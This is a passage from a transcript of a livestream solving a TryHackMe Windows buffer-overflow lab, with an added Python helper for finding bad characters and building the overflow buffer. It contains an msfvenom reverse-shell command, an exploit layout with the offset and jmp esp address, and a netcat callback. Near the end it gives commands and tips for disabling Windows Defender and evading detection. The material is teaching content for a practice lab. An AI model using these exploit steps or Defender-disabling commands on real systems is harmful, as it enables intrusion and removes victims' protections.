execute code off the stack. Again, in real, new, modern, actual current implementations, there are a lot of security mechanisms in place that don't allow you to do this, NX being one of them, the non-executable bit, DEP, data execution prevention, et cetera, that won't allow you to run code like that or execute shellcode just off the stack. So we know this is working now, but now we need to work with our payload and really start to do some damage. At this point you can generate some shellcode, and you can use msfvenom to do that for you. We know that our target is going to be running on Windows, and so you could use a staged, I believe, I might be getting the wrong word here, the underscore, which means that the entire payload is bundled up into this chunk on its own. It doesn't need to reach for another external stub. Staged and stageless, I always get the definition wrong in my head; I always say staged when it's all bundled together. But we'll set LHOST to be our callback IP address, LPORT has to be the port we'll go ahead and listen on, and then we'll add in our bad bytes and represent it in however way we would like. Let's do that. Let's use msfvenom -p windows/shell_reverse_tcp. I'll set my LHOST to be tun0, which I believe we know to be my IP address, that thing that exploit will know, and we'll set the LPORT to 9001, because it's over 9000, and we'll specify the format in Python, nice and easy. I think py3 is even a thing that will do, and it'll make it bytes for you. Lapis on the Moon is saying it should be called lower-dash instead of underscore. Vid Ath is asking, staged is when it isn't bundled together, right? I think you're right. I honestly always get that messed up in my head. Anyway, with our msfvenom command that we run, -f for the format to get the shellcode, but if you also specify -v, you can specify the variable name. I really, really like to do this because it gives you the variable name that you
might want to use in your code, like shellcode. Fingers crossed I had that syntax right. Take a second for it to generate. Nope, looks like it needed this specific format name, and it should be py, not py3. I was wrong, how about that. Cool, okay, so now you can see we have our shellcode right up here. I was bringing Streamlabs into the stream for a quick second; that was an accident. This works, but we forgot to specify those bad bytes, right? We can see the \x00 or these null bytes present. That's not going to work for us in our shellcode, so what we could do is rerun that same command, but let's use that -b to represent the bad bytes. Thankfully we've kept a list in this bad character script here. Let me copy all of these and I'll put them in Sublime Text. I am going to get them into a new tab and then just paste it, hit Shift+Tab to bring it all to the current line. If you like to work in Sublime Text, you can use Ctrl+A to select everything and then Ctrl+Shift+L to use multiple cursors, and then we can navigate around each of these lines. What I'm going to do is bring us to the end and then to the front, hit backspace and remove some of these things and remove all those lines, so I can eventually just have this syntax of these bytes all on one line. Quick Sublime Text magic tricks. There we go, we have all of our bad bytes present. Sudek is asking, yo, can you use the shikata_ga_nai encoder? Yes, you totally absolutely can. Because we've specified these specific bad bytes, looks like msfvenom wanted to encode it regardless, and it just chose shikata_ga_nai for us, so that's one of the handy things. I see Mayo Cat starting the holy wars between Vim and literally any other text editor, nice. Oh, and we can copy and paste all that shellcode, super bright, and let's get that into our script. "You need to put out a Sublime Text Udemy course." I appreciate that. Now we have our shellcode just slapped
into our program, and it added the byte syntax for us, nice and easy. So we know that our jmp esp would bring us to our C buffer, but we're gonna make some room as to where our C buffer is going to put data and put stuff. We should also generate that NOP sled, or the no-operation. Remember, a NOP sled is just the ability to do nothing; that's literally what it means, no operation. And they actually showcase this in TryHackMe just as well. They aren't using bytes, which is weird, but \x90 will do nothing. If we take that and multiply it by 16 or 20 or 24, just some factor of four again, a multiplication of four because of how long you'd expect them. California says, is NOP pretty much sleep? I wouldn't say that, because a sleep can say, hey, sleep for five thousand seconds. NOP is gonna say do nothing and continue, just keep cruising. We use the NOP sled because, in case there's some weird oddities, think of your jmp esp, that jmp esp instruction that you use to literally bebop the instruction pointer and bring your program to someplace else in the instructions and the code. Think of it as jumping on a trampoline: you don't know exactly where you're gonna land, so you want to give yourself enough of a cushion that you can continue on in code execution and continue on what you were doing without accidentally landing in some middle of the shellcode or something weird. So having a decent NOP sled is a good thing to do, and that's why we include that. So from our C buffer, where that would have been after the jmp esp, let's have our NOP sled right there, and then we could land somewhere in that after our jmp esp, and we'll slide down the NOP sled until we eventually get to our payload, or the real shellcode that we want to execute. And again, I would recommend, make sure you still keep your actual data and the buffer that you send the same length as you originally started with. So that means go ahead and subtract
out the length of the NOP sled and subtract out the length of the shellcode. The very, very last thing you send here should still kind of account for all the crap you just sent previously. Yeah, I think so. So what did we just tell this to connect back to? 9001, it looks like. What I like to do is make a comment just above my shellcode where I keep track of the msfvenom syntax that I used to create this, so I know if I need to regenerate with a different port or different bad bytes or anything like that. So theoretically, if we did everything perfectly, this is our buffer overflow exploit script. Looks like we've got, with some Black formatting, about 80 lines of code, 81, and let's see if we can get a reverse shell callback with this madness. What I'm gonna do is open this up on the side, bring that to the top over here, start up a netcat listener on 9001, let's get over to Immunity, and I'll hit Ctrl+F2 to restart it just for a safe sanity check, I'll hit F9 to run it, and then let's go into Sublime Text and hit Ctrl+B to run this code. There we go, saw the shell come back, right? We literally executed shellcode because we had this jmp esp instruction that we were able to latch onto, because we were able to clobber the instruction pointer, bebop around the program, enumerate what the bad bytes were so we knew what shellcode we could use, and then just cram it into a payload and weaponize it with a Python script. If I type in whoami, we can see that we are that account, and we can move around the file system, really do whatever we wanted to at this point. So nice and easy, we did it, after an hour of hanging out and, man, a lot of trouble with RDP to begin with. Let's get it started anyway. What is the EIP offset? That was 1978, right? Yep. In byte order and including the null byte, what were the bad characters? Oh, so what were our bad characters? Just those ones that we included for the msfvenom payload. We can grab that right here, boom. Why
oh, including null bytes, you dumbo. Did we miss some bad bytes? "Would you be able to really quickly re-explain how you generated the shellcode?" Yes, absolutely, I can totally do that for you, Rocket Sheep, and then I think I might start to wind this down because it's 1:30 in the morning. All right, so we generated shellcode with the msfvenom utility. msfvenom will take a specific payload that you want to try and execute. You can do things like command, run something in Windows, or pop calc, or do anything that you could do with shellcode. Oftentimes what we'd like to do is just get a simple reverse shell, shell_reverse_tcp. You could use Meterpreter if you really wanted to, or anything like that. And then make sure, if you want to use the stageless process, which you often want to do if you are going to catch this with netcat, because if you use a staged one with the forward slash, you'll need to make sure you catch this in Metasploit's msfconsole exploit/multi/handler. Personally, I like to catch things in netcat or pwncat, so I just use the stageless one with the underscore. And then we specify the arguments that we might want to use for that payload, the parameters and settings that you need. So I'm setting the LHOST, which will realistically be your IP address. That was 10.10.186.54 or whatever; you can specify an interface and Metasploit totally knows what to do with it, so tun0 is much easier than typing or remembering the IP address every time. Specifying your LPORT, you could specify literally anything that you want to listen on. -f to specify the format; we know -f py is what we're looking for. And then shellcode, or a variable name you can specify with -v. But don't forget, you'll want to specify those bad bytes with -b, and we just specified that way over here. So we can let that churn out. It takes a quick second, but you can build all things just like that. msfvenom is nice and fun, but
again, if you are into the pwntools realm, let's get bpython open again. Let's import pwn. Oh god, sorry, `from pwn import *`. Just be Python, not like that; maybe regular Python. `from pwn import *`, or is that going to break [ __ ] again? What? Oh, I have an extra r. But what, Python 3.8? There we go, okay. Could I use bpython with that? I'm sorry, I'm totally on a tangent. bpython, in version that thing, but `from pwn import *` does not want to play nice right now. There is a question: is bpython a lightweight Python interpreter? I don't exactly know. It is another Python interpreter. I like to use it because it has syntax highlighting, and I think that's very, very nice for demonstrations and showcasing content. But what I'm trying to discuss is that pwntools has this utility shellcraft, and shellcraft will let you craft shellcode. I believe you can use shellcraft dot processor type, like i386 or amd64 or any of those. i386 we can use for an example, and then you could specify the platform, whether or not you want it to be Linux or Windows, but Linux is the one that I know off the top of my head. And then you can make it do specific things, like run specific things, and this will return out to you what assembly code would normally be used to actually do that. If I were to print that out, you can see this is the assembly code to execute that. If you wanted to get the assembly bytes for that, pwntools has a handy function, asm, to get the assembly, and boom, now you have the legitimate raw bytes. This is super duper nice because you could very, very easily say, hey, I want you to run the cat command and I want you to cat out a file called flag.txt. Boom, there's your shellcode, or again, if you wanted the literal interpretation of that, you get all that. There are some really, really nice, handy things that you could do in that library of shellcraft, but again, if you're doing
pwntools things rather than msfvenom. Rocket Sheep is saying, is there a reason you steer away from pwntools? Generally I don't, and if you know that you can use pwntools and you want to use pwntools, I would always recommend using it. The reason that I guess I tend to talk around it these days is because I'm showcasing this content for you to learn, and especially with doing things like Offensive Security, like the OSCP exam, or for eLearnSecurity, eCPPT, et cetera, I think when they try to recreate it and run and test the script, I don't want there to be any confusion about them having pwntools installed or not installed. So I just tend to use built-in libraries when I have to submit this as an exam or an assessment. But again, in the real world, if you got pwntools, bro, just use pwntools. I'm missing a lot of questions in chat, I'm super sorry. Nita was asking, hey, how did you actually send the payload? Our Python script handles this really, really nicely for us with just a simple context manager. We use a with statement and connect the socket and send it. That's all it takes. Oreobite is asking, hey, will this VOD be up if I missed something? Yes, absolutely. This VOD will be up on Twitch and of course I'll upload it to YouTube, and I think those should start to kick in by the end of the week or so. SlickPopStream says, am I right in thinking this can easily be caught by intrusion detection, as a plain-text connection out from the target, or antivirus, as recognizable shellcode from msfvenom? Yes, you are absolutely correct in thinking that, because Meterpreter itself is going to get caught by Windows Defender really, really easily. Sorry, if you were to obfuscate Meterpreter, and you can try to hide it, you could try to bundle up and pack the executable for it to do something different, it might work, but Defender will literally trigger off of the network traffic of Meterpreter, so that will always be a bad time if you're trying to
use Meterpreter, or a pure Meterpreter, now against a machine that has Windows Defender enabled. Normally your best bet is to try and obfuscate and get some access with a command-and-control, or C2, framework where you can remain stealthy and try to be undetected with obfuscation and evasion tricks like that, and then escalate your privileges, do whatever privesc stuff you need to do, and just destroy Defender: kill it, nerf it, Set-MpPreference -DisableRealtimeMonitoring $true, literally run MpCmdRun and just delete all Defender signatures. I really love using that trick if Set-MpPreference isn't available. And then once you have forced Defender off, use Meterpreter, use whatever you want to do. You can totally wreak havoc once you turn off the AV. "What to do when you can't disable Windows Defender as SYSTEM?" Is there a reason why? I mean, I guess, like for scoping, for rules of engagement, hey, you're not allowed to turn off the AV, then you just have to get really clever, try and obfuscate, try and do evasion. It's tough to do. "It just gives an error." I don't know what you mean. Is there a reason why? I am currently running in a Windows 2019 Server. It won't let me, sink in, zoom in. "Is it usually harder to evade third-party AV like Kaspersky?" Maybe. I really can't give you an absolute, definitive, certain answer to that, because it totally depends on what they're tracking, what they're doing, and it changes all the time. I personally, and maybe I'm a bit biased, am an extreme supporter and a huge supporter of Windows Defender. I think it has become a formidable foe and is very, very tough to get around these days. So I got real-time protection on and everything right now, but if I were to try and Set-MpPreference -DisableRealtimeMonitoring $true, looks like that succeeded for me, and real-time protection is now off. That's just one example. There we go, and that will do the thing you're talking about. The Windows Defender service, like Windows Defender
Antivirus, oh, this guy. Yeah, it's totally not gonna want you to touch that. I don't know if that's going to be something that I could easily answer off the top of my head right now at one in the morning, but yeah, you just straight up can't touch it. What was the other thing you said to do when you can't disable Set-MpPreference? Let me track that down in my OSCP notes. I don't think there's any issue with me showing that right now, hopefully not. I open another vault, open certs, OSCP workspace, select folder, ta-da. Don't look at my exam, everybody, please, please don't look at my exam. Obsidian, there it is. Oh, what do we got, what do we got? Reference lookup. I think I can search for "disable defender." Oh, this is it, this is it right here. Let me nerf this and not run the risk of showcasing any sensitive things. So this is a super jerk move, that is one of my favorites though: try to just straight up kill all of the Defender definitions. Run the original MpCmdRun, the actual engine and executable for Defender, and then remove definitions, all of them. So that's a good cmd.exe trick if PowerShell's Set-MpPreference isn't working for you. Yeah, let's hang out in the chat for a little bit. Thanks so much for being with me, everybody. I'm going to stop recording, for the YouTube video's sake, to allow this to offer some resolution for people tuning in on the YouTube video. I hope you enjoyed it. Obviously we haven't even worked through the whole rest of that TryHackMe room, but we could continue. And I literally didn't have the bytes right, wow. There are so many of these; we don't need to do all that right now, maybe I could do it later. Ooh, I think you had an extra... oh, the 2d one was wrong, thank you Ghost X Ghost. And then we got to do this all over again for overflow two and three, and oh my god. Okay, thanks so much for watching everybody that's tuning in on YouTube. I hope you enjoyed this. I'm gonna hang out with the Twitch
stream people. I love you. Bye.
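The bad-character loop and the struct.pack trick walked through in the stream, as an added Python example that is not code from the VOD or from the TryHackMe room. The bad bytes (00, 07, 2d, 2e, a0), the EIP offset of 1978 and the jmp esp address 625011af are the values found in the video; fake_target is a constructed stand-in for the vulnerable service that mangles exactly those bytes, so the iteration can be run offline with no target at all. It does by comparison what the stream does by eye (diffing the dump against what was sent), and it adds the check a practitioner wants before assembling the buffer: that the return address and shellcode contain none of the known bad characters, and that the total length still matches the original crash buffer.

```python
import struct

# Bad characters found by hand in the video (0x00 is assumed bad from the start).
BAD_CHARS = b"\x00\x07\x2d\x2e\xa0"


def all_chars(bad=b""):
    """Every byte 0x01..0xff, minus the bad characters found so far."""
    chars = bytes(range(1, 256))
    for b in bad:
        chars = chars.replace(bytes([b]), b"")
    return chars


def first_mangled(sent, observed):
    """Return the first sent byte whose copy in the dump differs, or None.

    This is the 'look down the dump for the first break in the 01 02 03 ...
    pattern' step from the video, done by comparison instead of by eye.
    """
    for s, o in zip(sent, observed):
        if s != o:
            return s
    if len(observed) < len(sent):          # dump cut off after some byte
        return sent[len(observed)]
    return None


def find_bad_chars(send_and_dump, known=b"\x00", limit=16):
    """Iterate: send the remaining characters, diff the dump, add the first
    mangled byte to the list, repeat until the dump matches what was sent."""
    bad = bytes(known)
    for _ in range(limit):
        probe = all_chars(bad)
        culprit = first_mangled(probe, send_and_dump(probe))
        if culprit is None:
            return bad
        bad += bytes([culprit])
    raise RuntimeError("too many bad characters; something else is wrong")


def p32(value):
    """Little-endian 32-bit pack, the same as pwntools' p32()."""
    return struct.pack("<I", value)


def build_payload(offset, jmp_esp, shellcode, total=5000, nop_len=16, bad=BAD_CHARS):
    """offset bytes of filler, the return address, a NOP sled, the shellcode,
    then C padding so the total length equals the original crash buffer."""
    ret = p32(jmp_esp)
    for name, chunk in (("return address", ret), ("shellcode", shellcode)):
        hit = set(chunk) & set(bad)
        if hit:
            raise ValueError(f"{name} contains bad characters: {[hex(h) for h in hit]}")
    body = b"A" * offset + ret + b"\x90" * nop_len + shellcode
    if len(body) > total:
        raise ValueError("payload longer than the original buffer")
    return body + b"C" * (total - len(body))


# Constructed stand-in for the target service: it corrupts the same bytes the
# video found, so the loop above can be exercised without a real binary.
_MANGLE = {0x07: b"\x0a\x0d", 0x2d: b"\x0a", 0x2e: b"\x0a", 0xa0: b"\x0d\x0a"}


def fake_target(data):
    """Return what the stack dump would show after the service handled data."""
    return b"".join(_MANGLE.get(b, bytes([b])) for b in data)


if __name__ == "__main__":
    found = find_bad_chars(fake_target)
    print("bad chars:", " ".join(f"{b:02x}" for b in found))
    print("jmp esp packed:", p32(0x625011AF))
    # \xcc (int3) stands in for real shellcode here.
    payload = build_payload(1978, 0x625011AF, b"\xcc" * 8)
    print("payload length:", len(payload))
```

Swap fake_target for a function that sends the probe over the socket and returns the bytes copied out of the debugger's dump, and the loop is the automated version of the manual process; when the list is complete the same BAD_CHARS string is what goes to msfvenom -b.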
Info
Channel: John Hammond
Views: 28,428
Id: eLIRjcI5eYU
Length: 86min 3sec (5163 seconds)
Published: Mon Sep 13 2021